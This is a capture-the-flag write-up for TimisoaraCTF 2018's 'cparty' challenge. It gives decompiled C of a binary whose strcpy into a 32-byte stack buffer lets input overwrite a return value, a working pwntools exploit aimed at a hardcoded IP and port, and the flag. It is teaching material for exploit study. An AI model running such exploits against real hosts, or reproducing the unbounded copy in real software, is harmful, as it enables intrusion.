TimisoaraCTF2018-cparty

Question

c_party.zip

Solution

睇睇個main先啦 (first, look at `main`)

// Decompiled entry point (Hex-Rays pseudocode of the 32-bit challenge binary).
// Flow: read one line from stdin as the "password", pass it to sub_8048800,
// and run `cat /home/party/flag` only if that call returns -1059127554,
// which is 0xC0DEFEFE reinterpreted as a signed 32-bit int. Nothing here
// looks at whether the password was actually correct; only the returned
// integer decides.
void __cdecl __noreturn main()
{
char v0; // [sp+58h] [bp-10h]@1 -- getline's size_t *n slot (Hex-Rays mistyped it as char)
int v1; // [sp+5Ch] [bp-Ch]@1 -- char *lineptr for getline; heap buffer holding the user line
int v2; // [sp+60h] [bp-8h]@1 -- zeroed and otherwise unused in the decompiled output

v2 = 0;
alarm(0x3Cu); // 60 s watchdog against idle connections; no SIGALRM handler is visible here
setvbuf(stdin, 0, 2, 0); // 2 == _IONBF: unbuffered stdio so the prompt reaches the socket immediately
setvbuf(stdout, 0, 2, 0);
puts("***^^^ STaR_C_PartY ^^^***");
puts("-- Welcome to the party --");
printf("Password: ");
v1 = 0;
// getline() with a NULL buffer and size 0 allocates as much as needed, so the
// line length is fully attacker-controlled. That unbounded string is what
// sub_8048800 later strcpy()s into a fixed 32-byte stack buffer.
if ( getline(&v1, &v0, stdin) == -1 )
{
perror("Failed reading user password");
exit(1);
}
// -1059127554 == (int)0xC0DEFEFE. sub_8048800 zeroes its return variable and
// never assigns it again, so this branch is only reachable by corrupting that
// variable through the strcpy() overflow in that function.
if ( sub_8048800(v1) == -1059127554 )
{
puts("Oh, you're VIP, here's the special VIP ticket:");
system("cat /home/party/flag"); // fixed command string; no user input reaches the shell
}
exit(0);
}

sub_8048800

// Decompiled password check (Hex-Rays pseudocode). Reads the first line of
// /home/party/orgs_password.txt, strips its trailing newline, copies the
// caller-supplied line a1 into a 32-byte stack buffer and compares the two.
// Returns v8, which is initialised to 0 and never assigned again: every
// normal path returns 0 regardless of the password. The only way for a
// caller to see another value is the stack overflow in the strcpy() below.
//
// Stack layout from the Hex-Rays annotations (lowest address first):
//   dest   [bp-0x40]
//   v5     [bp-0x3C]
//   stream [bp-0x38]
//   s      [bp-0x34]  32 bytes (0x20, see the memset)
//   v8     [bp-0x14]  = s + 0x20, the return value
//   v9     [bp-0x10]  = s + 0x24, copy of a1
// Anything written past s[31] lands on v8, then v9, then whatever follows
// (presumably the saved frame pointer and return address, not shown here).
int __cdecl sub_8048800(const char *a1)
{
const char *s1; // ST18_4@7
size_t v2; // eax@7
char *dest; // [sp+48h] [bp-40h]@4 -- organiser password line, heap-allocated by getline()
int v5; // [sp+4Ch] [bp-3Ch]@4 -- size_t *n slot for that getline()
FILE *stream; // [sp+50h] [bp-38h]@1
char s; // [sp+54h] [bp-34h]@1 -- really char s[32]; Hex-Rays shows only the first byte
int v8; // [sp+74h] [bp-14h]@1 -- return value, directly above s
const char *v9; // [sp+78h] [bp-10h]@1 -- caller's password pointer

v9 = a1;
v8 = 0;
memset(&s, 0, 0x20u); // zero the 32-byte buffer; this is the only size the copy below never honours
stream = fopen("/home/party/orgs_password.txt", "r");
if ( !stream )
{
perror("Failed opening organisers password file");
exit(1);
}
v5 = 0;
dest = 0;
if ( getline(&dest, &v5, stream) == -1 )
{
fclose(stream);
perror("Failed organisers password");
exit(1);
}
fclose(stream);
dest[strcspn(dest, "\n")] = 0; // drop the trailing newline (no-op if the line has none)
// BUG: unbounded copy of an attacker-controlled string into a 32-byte buffer.
// a1 comes from getline() on stdin in main(), so its length is unlimited;
// bytes 32..35 overwrite v8, bytes 36.. overwrite v9 and beyond. A bounded
// copy such as snprintf((char *)&s, 0x20, "%s", v9) would close the hole.
strcpy(&s, v9);
s1 = dest;
v2 = strlen(dest);
// Prefix comparison: only the first strlen(dest) bytes are checked, so any
// user line that starts with the organiser password passes (and an empty
// first line in the file would make strncmp(..., 0) accept everything).
// Passing only prints a ticket id; it does not touch v8, so it never
// unlocks the flag in main().
if ( !strncmp(s1, &s, v2) )
{
puts("Good password. Now you'll get your ticket...");
puts("Ticket id: timctf{0112-3581-3213-4558-9144}");
}
else
{
puts("Bad password. No ticket, go home!");
}
free(dest);
return v8; // 0 unless the strcpy above overwrote it
}

似乎我地要做到既野正係需要令到 sub_8048800 既return變做0xC0DEFEFE 就完事 (i.e. make sub_8048800 return 0xC0DEFEFE, which main compares as the signed int -1059127554). The return value is the local v8, which is set to 0 and never written again, but it sits exactly 0x20 bytes above the 32-byte buffer s ([bp-0x34] vs [bp-0x14]); the unbounded strcpy(&s, v9) of our input line therefore lets us overwrite v8 with 32 bytes of padding followed by the wanted value. The organiser password itself is never needed.

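import sys

from pwn import *

# Target from the original writeup; override with `python exploit.py HOST PORT`.
HOST = sys.argv[1] if len(sys.argv) > 1 else "89.38.210.128"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 31338

# Why this works (from the decompiled sub_8048800): the user line is strcpy()'d
# into a 32-byte stack buffer `s` at [bp-0x34], and the function's return
# variable `v8` sits at [bp-0x14], i.e. exactly 0x20 bytes past the start of
# `s`. main() prints the flag when that return value is -1059127554, which is
# 0xC0DEFEFE as a signed 32-bit int. So: 32 bytes of filler, then the wanted
# value little-endian (32-bit binary). The organiser password is never needed.
BUF_SIZE = 0x20
WANTED = 0xC0DEFEFE

# Bytes throughout: pwntools' p32() returns bytes, and mixing str with bytes
# raises TypeError on Python 3 (the original script was Python 2 only).
payload = b"a" * BUF_SIZE + p32(WANTED)

p = remote(HOST, PORT)
p.recvuntil(b"Password: ")
# sendline appends "\n"; together with strcpy's terminator that lands on `v9`
# (right after v8), which is not used after the copy, so it is harmless.
p.sendline(payload)
# Whatever the server has sent so far: the password verdict and, if the
# overwrite worked, the VIP line followed by the flag.
print(p.recv(1024))
p.interactive()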

Flag

timctf{d0nt_cr4sh_th3_p4rty_b3_th3_p4rty}